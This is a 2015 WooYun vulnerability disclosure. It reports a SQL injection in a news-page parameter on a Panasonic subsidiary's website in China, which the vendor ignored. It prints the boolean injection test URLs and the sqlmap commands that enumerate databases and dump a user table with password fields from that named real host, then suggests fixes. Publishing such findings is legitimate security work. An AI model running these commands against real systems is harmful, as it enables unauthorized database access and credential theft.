当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138633

漏洞标题:松下中国旗下某公司网站SQL注入漏洞

相关厂商:松下电器(中国)有限

漏洞作者: 小花猪Python

提交时间:2015-09-02 16:48

修复时间:2015-10-17 16:50

公开时间:2015-10-17 16:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

松下中国旗下某网站存在SQL注入漏洞,可获取数据库中存储的数据

详细说明:

存在SQL注入漏洞的网站是松下冷链(大连)有限公司,链接为

http://coldchain.panasonic.cn/

,存在问题的链接为

http://coldchain.panasonic.cn/w_xwzx/show_news.jsp?noteid=347

,通过1=1与1=2判断注入,

http://coldchain.panasonic.cn/w_xwzx/show_news.jsp?noteid=347 and 1=1

屏幕快照 2015-09-02 16.21.40.png

,

http://coldchain.panasonic.cn/w_xwzx/show_news.jsp?noteid=347 and 1=2

屏幕快照 2015-09-02 16.22.42.png

,通过sqlmap获取当前用户与数据库

sqlmap -u "http://coldchain.panasonic.cn/w_xwzx/show_news.jsp?noteid=347" --current-db --current-user

屏幕快照 2015-09-02 15.35.49.png

漏洞证明:

1)获取数据库信息

sqlmap -u "http://coldchain.panasonic.cn/w_xwzx/show_news.jsp?noteid=347" --dbs

,得到系统与用户数据库34个

屏幕快照 2015-09-02 15.39.16.png

2)获取数据库BBS的表信息

sqlmap -u "http://coldchain.panasonic.cn/w_xwzx/show_news.jsp?noteid=347" -D BBS --tables

屏幕快照 2015-09-02 16.28.12.png

3)获取表BBS_USER的前十个数据

sqlmap -u "http://coldchain.panasonic.cn/w_xwzx/show_news.jsp?noteid=347" -D BBS -T  BBS_USER -C "ID,NAME,PASSWORD,USERNAME" --dump start 1 --stop 10

屏幕快照 2015-09-02 15.51.50.png

修复方案:

1)完善代码,严格过滤用户输入
2)部署WAF

版权声明:转载请注明来源 小花猪Python@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)